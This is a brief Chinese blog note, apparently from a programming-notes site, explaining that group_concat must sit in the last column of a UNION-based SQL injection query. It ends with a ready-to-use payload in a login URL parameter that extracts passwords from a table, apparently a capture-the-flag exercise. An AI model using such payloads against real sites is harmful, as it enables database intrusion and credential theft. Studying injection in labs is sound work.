篇首语:本文由编程笔记#小编为大家整理,主要介绍了sql注入中联合查询group_concat位置相关的知识,希望对你有一定的参考价值。
普通姿势
直到
可以看到报错,但我们的语句并没有任何错误
换到第三个位置就可以正常显示
本地实验也是会报错
最终payload都是在最后一个位置上
?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222